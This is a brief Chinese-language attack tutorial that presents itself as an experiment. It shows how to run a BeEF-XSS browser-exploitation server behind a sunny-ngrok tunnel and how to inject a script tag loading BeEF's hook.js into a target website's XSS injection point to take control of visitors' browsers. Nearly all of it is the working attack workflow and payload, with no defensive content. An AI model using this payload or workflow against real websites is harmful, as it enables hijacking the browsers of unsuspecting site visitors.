一、实验工具
1、kali linux 2019.1-vm-amd64
2、beef-xss
3、sunny-ngrok
二、步骤
1、运行sunny程序
./sunny clientid 隧道id
2、自定义监听端口并开启beef-xss
修改配置文件,配置文件路径:/etc/beef-xss/config.yam
启动beef-xss
beef-xss
3、在目标网站的注入点进行xss注入
注入代码:
<script type="text/javascript" src="http://127.0.0.1:11098/hook.js"></script>
执行成功,连接控制台:
从而开始进行深入浏览器攻击。